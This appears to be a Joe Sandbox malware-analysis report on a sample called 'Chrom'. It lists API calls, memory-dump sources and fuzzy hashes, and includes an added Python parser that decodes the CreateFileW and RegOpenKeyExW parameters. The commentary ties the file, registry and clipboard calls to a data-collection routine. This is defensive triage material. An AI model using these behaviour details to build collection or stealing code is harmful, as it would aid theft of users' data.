                                                                                                                                                        • Instruction Fuzzy Hash: 7FC092B0240200BEFE224B10EC15F36669CD780701F2004247E00E40E0C1604E188524
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 680376a1705957ae3a1bbded056498c64766bd9d2b751ddd79e3da9690a8832c
                                                                                                                                                        • Instruction ID: adc684fa4d176c709e0b5a021f9c2e2f242b30b566e97c1e18dbffa254e16f52
                                                                                                                                                        • Opcode Fuzzy Hash: 680376a1705957ae3a1bbded056498c64766bd9d2b751ddd79e3da9690a8832c
                                                                                                                                                        • Instruction Fuzzy Hash: 56C012F02503007EFF304B10AC0AF37769DD7C0701F1044307E00E40E1C2A14C488524
                                                                                                                                                        APIs
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,0040B5FD,00000000,0040700C), ref: 0040B678
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??3@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                        • Opcode ID: 8026c71734dfa41369215d123a13b243002bdb1e268899024844832d7108e649
                                                                                                                                                        • Instruction ID: d23f394f445174d82bf5c374610f4e11a096298af16890c94d1ac581a8101d62
                                                                                                                                                        • Opcode Fuzzy Hash: 8026c71734dfa41369215d123a13b243002bdb1e268899024844832d7108e649
                                                                                                                                                        • Instruction Fuzzy Hash: 56C09BB15117014BFB305E15C40471273D49F60727F354D1DA8D2914C1D77CD440865D
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNELBASE(?,0041608B,00000000,00413FA7,?,?,?,?,?,00403CF9,?), ref: 00416074
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: e9866dcb680b9a0d0965807e9c09656def5765bcc3968a07479bcdd52cf4d20d
                                                                                                                                                        • Instruction ID: c4f7802c24e59161306af1403d88e20ea41b7baad8a9019303b140db1e88e420
                                                                                                                                                        • Opcode Fuzzy Hash: e9866dcb680b9a0d0965807e9c09656def5765bcc3968a07479bcdd52cf4d20d
                                                                                                                                                        • Instruction Fuzzy Hash: ADC04C351107018FE7218B62C949753B7E4AB00316F40C818949685850D77CE854CE18
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 0044E199
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: 600d0468050d6c0c974190016e207e925c0ab4fd49a9922a22aac3e50904c676
                                                                                                                                                        • Instruction ID: ca87bd2022555555e1e71ab19cfd3b78776a4971098d47f20d95beb5d2123f01
                                                                                                                                                        • Opcode Fuzzy Hash: 600d0468050d6c0c974190016e207e925c0ab4fd49a9922a22aac3e50904c676
                                                                                                                                                        • Instruction Fuzzy Hash: CCC04C355503008FF7168F22ED4E76A32B4B700357F414D74D40085062EB78C514CA1C
                                                                                                                                                        APIs
                                                                                                                                                        • FindClose.KERNELBASE(?,0040B447,?,00000000,004149BF,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B4EE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                        • Opcode ID: 7b6ab146b4268e51a5c44590b0b181f0b71ff05a35f264cb6b2d58c8236388a4
                                                                                                                                                        • Instruction ID: 4ebaaad3abebb35ea561999068b04e119c5bd0073050e994cd3dd7ff13ec2e23
                                                                                                                                                        • Opcode Fuzzy Hash: 7b6ab146b4268e51a5c44590b0b181f0b71ff05a35f264cb6b2d58c8236388a4
                                                                                                                                                        • Instruction Fuzzy Hash: E6C048341109028AE2285B38985942A76A0AA4A3303B40F6CA0F6920F0EB3899868A08
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: 45ec320b698d0105a77b428ef27c265de4d5060260cc72b868003af4cb6e54e0
                                                                                                                                                        • Instruction ID: 81611b1af33cf8bffabafaac40f523e309f93145d8b60d33e97b966a2711c68d
                                                                                                                                                        • Opcode Fuzzy Hash: 45ec320b698d0105a77b428ef27c265de4d5060260cc72b868003af4cb6e54e0
                                                                                                                                                        • Instruction Fuzzy Hash: 93B012792104009BCB080734DE4504E35505F49631760073CB033C00F0DB20CC64BA00
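The "APIs" lines in these function records print raw stack slots at the call site, so a triager has to decode the constants by hand: the two CreateFileW calls above pass 80000000/00000003/00000003 (GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING) and 40000000/00000001/00000002 (GENERIC_WRITE, FILE_SHARE_READ, CREATE_ALWAYS), and the RegOpenKeyExW call recorded below passes 80000002 and 00020019 (HKEY_LOCAL_MACHINE, KEY_READ). The following parser is an added example written for this page, not code from the Joe Sandbox report or the analysed sample; it takes the three lines exactly as printed in the report as constructed input and turns the positional parameters into names. The constant values are the documented Win32 ones; the assumption that Joe Sandbox places the resolved lpSubKey string somewhere in the slot list (rather than at the formal parameter position) is taken from the one RegOpenKeyExW line on this page, and slots beyond the formal parameters (return addresses, `?`) are deliberately left undecoded. The report itself does not say which file each CreateFileW call targets; the first shape (read an existing file while tolerating another process holding it open for writing) and the second (create or truncate an output file) are simply the primitives a collection routine needs.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function listing into readable call summaries.

Added example, not part of the report. Constants are the documented Win32 values
(winnt.h / winbase.h / winreg.h). Only slots at a formal parameter's position are decoded.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the two CreateFileW calls and the RegOpenKeyExW call from this report.
SAMPLE_LINES = [
    "CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,"
    "0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94",
    "CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,"
    "00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD",
    "RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00416C27,80000002,"
    "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders,004148A8,?,?,00000000), ref: 00416479",
]

LINE_RE = re.compile(r"^(?P<api>[^.(]+)\.(?P<module>[^(]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS", 0x80000005: "HKEY_CURRENT_CONFIG"}
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x10000: "DELETE",
              0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
KEY_COMPOSITES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]   # raw tokens: 8-digit hex, '?' for unresolved, or a resolved string
    ref: str          # address of the call instruction


def parse_line(line: str) -> ApiCall:
    """Split 'Api.Module(a,b,...), ref: addr' into its parts."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    # Resolved strings on this page contain no commas, so a plain split is sufficient here.
    return ApiCall(m["api"], m["module"], m["args"].split(","), m["ref"])


def as_u32(token: str) -> Optional[int]:
    """8-digit hex slot -> int; '?' and resolved strings -> None."""
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else None


def decode_flags(value: Optional[int], table: Dict[int, str]) -> List[str]:
    """Bitmask -> flag names; bits the table does not know are reported as hex."""
    if value is None:
        return ["<unresolved>"]
    names = [name for bit, name in table.items() if value & bit == bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


def summarize(call: ApiCall) -> Dict[str, object]:
    """Decode the parameters that matter for triage; other APIs pass through undecoded."""
    out: Dict[str, object] = {"api": call.api, "module": call.module, "ref": call.ref}
    if call.api in ("CreateFileW", "CreateFileA") and len(call.args) >= 5:
        # CreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, ...)
        access, share, _sec, disp = (as_u32(t) for t in call.args[1:5])
        out["desired_access"] = decode_flags(access, GENERIC_ACCESS)
        out["share_mode"] = decode_flags(share, SHARE_MODE)  # empty list means exclusive open
        out["creation_disposition"] = CREATION_DISPOSITION.get(
            disp, f"0x{disp:08X}" if disp is not None else "<unresolved>")
    elif call.api in ("RegOpenKeyExW", "RegOpenKeyExA") and len(call.args) >= 4:
        # RegOpenKeyEx(hKey, lpSubKey, ulOptions, samDesired, phkResult)
        root, sam = as_u32(call.args[0]), as_u32(call.args[3])
        out["root_key"] = HKEY_ROOTS.get(root, f"0x{root:08X} (open handle)" if root is not None else "<unresolved>")
        out["sam_desired"] = decode_flags(sam, KEY_RIGHTS)
        out["sam_desired_name"] = KEY_COMPOSITES.get(sam)
        # Assumption from this report: the resolved lpSubKey string appears somewhere in the slot list.
        out["subkey"] = next((a for a in call.args if "\\" in a), None)
    return out


def summarize_report_lines(lines: List[str]) -> List[Dict[str, object]]:
    return [summarize(parse_line(ln)) for ln in lines]


if __name__ == "__main__":
    for summary in summarize_report_lines(SAMPLE_LINES):
        print(summary)
```

Run it against the three report lines and the first CreateFileW resolves to GENERIC_READ with FILE_SHARE_READ|FILE_SHARE_WRITE and OPEN_EXISTING, the second to GENERIC_WRITE with FILE_SHARE_READ and CREATE_ALWAYS, and the RegOpenKeyExW to HKEY_LOCAL_MACHINE with KEY_READ on the Shell Folders key. Unknown bits are never silently dropped: anything outside the tables comes back as a hex remainder so an unusual access mask stands out rather than being mislabelled.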
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00416C27,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,004148A8,?,?,00000000), ref: 00416479
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                        • Opcode ID: fdd4ee8420ff38d50ee0fd67c97a440200559db92fa8313b56074c36fcf39447
                                                                                                                                                        • Instruction ID: 83906f0e37f9444889d0528ca96d09476c9ae61f439c3988bf04068afc79b07d
                                                                                                                                                        • Opcode Fuzzy Hash: fdd4ee8420ff38d50ee0fd67c97a440200559db92fa8313b56074c36fcf39447
                                                                                                                                                        • Instruction Fuzzy Hash: 01C09B39544301BFDF114F40FE05F0ABB61ABC4B05F004414B344240B282714414EB17
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c265d845e0503975fe3eaa0d393b723af7b5bd811e49d12fd140daf2da0adf48
• Instruction ID: 44a613232f5d856dc5ac7483348cac20a1fabfd44cd96dfcc582b64180e5c4d2
• Opcode Fuzzy Hash: c265d845e0503975fe3eaa0d393b723af7b5bd811e49d12fd140daf2da0adf48
• Instruction Fuzzy Hash: 16319CB1A01B05EFDF24AF15D8417DA73A0BB21356F15412BF8149B241D738ADE0CBDA
APIs
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
• Opcode ID: 13af99538766b2a182500595b229227d4534b1020d2eec3942169f622147e130
• Instruction ID: 355d7b68675bcf71531e109d1974fa15c2d23b2ab6a250ec1a74cd6812f94247
• Opcode Fuzzy Hash: 13af99538766b2a182500595b229227d4534b1020d2eec3942169f622147e130
• Instruction Fuzzy Hash: 3F115E71600606AFCB14DF65C9C199EB7F8FF44314B10853EE596E3282EB34F9459B68
APIs
  • Part of subcall function 00407AD0: CloseHandle.KERNEL32(000000FF,00407A60,00000000,00000000,0040BD9A,?,00000000,00000104,00000000,?,?,?,0040C27F,?,0040C401,000000FF), ref: 00407AD8
  • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
• GetLastError.KERNEL32(00000000,00000000,0040BD9A,?,00000000,00000104,00000000,?,?,?,0040C27F,?,0040C401,000000FF,?,00000104), ref: 00407ABD
  • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
• Opcode ID: b5cb65a831526968e61f3b8b20486ca7c6747027f1051b4f106f0081e9cc041b
• Instruction ID: 35cd9f8c1dcfc8a6b291ae52797bf89ab5d951bbdcfd6650bf437470b2e439e1
• Opcode Fuzzy Hash: b5cb65a831526968e61f3b8b20486ca7c6747027f1051b4f106f0081e9cc041b
• Instruction Fuzzy Hash: 3601D6B1A182019EE3209B30C80579B77D8EF50315F14883FE596E62C1E77CA9808A7F
APIs
  • Part of subcall function 0040B671: ??3@YAXPAX@Z.MSVCRT(00000000,0040B5FD,00000000,0040700C), ref: 0040B678
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: 35078aa9528d176a3a2e80a839a21edae065cbdddee7803ec72af34415444393
• Instruction ID: 1651319002fec664f26f06c15537a8029accf68742c71f4261269a8637093df6
• Opcode Fuzzy Hash: 35078aa9528d176a3a2e80a839a21edae065cbdddee7803ec72af34415444393
• Instruction Fuzzy Hash: 1EC02B7281D2104FDB10FF74340145A23D4CE832203014C2FE4C0F3100D6384401039D
APIs
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 7e96c0334e5700b3217717c12c936e5c8bc79841484eb53a37ab721f95e95596
• Instruction ID: a4aab80efa05a36e40e003174c8289b0fd75b8aa2e0c69bc48311badf276c503
• Opcode Fuzzy Hash: 7e96c0334e5700b3217717c12c936e5c8bc79841484eb53a37ab721f95e95596
• Instruction Fuzzy Hash: 3BC002B25117018BE7349E15C449766B3E8EF20B6BF61881D94E591481D7BCD4848A18
APIs
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 8bbca39f266a6f000b4c72b8d7a71c68e8e69029b91d150487a399c13b1e3803
• Instruction ID: de1c0baefddc23ff079bab1c2c377a9ae2e5f1a26b18513abd574526421c75a5
• Opcode Fuzzy Hash: 8bbca39f266a6f000b4c72b8d7a71c68e8e69029b91d150487a399c13b1e3803
• Instruction Fuzzy Hash: 39C002B2551B098FE7209E15C505762B3E8AF1073BF958D1D94D5914C1DB7CD4448E15
APIs
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: df981978903576c94245b9e122b1d11dbdca9cb07129e532542aba849d07663a
• Instruction ID: 3aa5576ec611755f8cd3c559a3e90b43ca4d179dd92e5c4db0b995cbc1efbf24
• Opcode Fuzzy Hash: df981978903576c94245b9e122b1d11dbdca9cb07129e532542aba849d07663a
• Instruction Fuzzy Hash: 9C9002C2496519105D0431755C06505120C4852136375075A7032959D1CE1880506129
                                                                                                                                                        APIs
                                                                                                                                                        • EmptyClipboard.USER32 ref: 00409EAB
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409EC8
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00409ED9
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409EE6
                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00409EF9
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00409F0B
                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409F14
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00409F1C
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00409F28
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00409F33
                                                                                                                                                        • CloseClipboard.USER32 ref: 00409F3C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
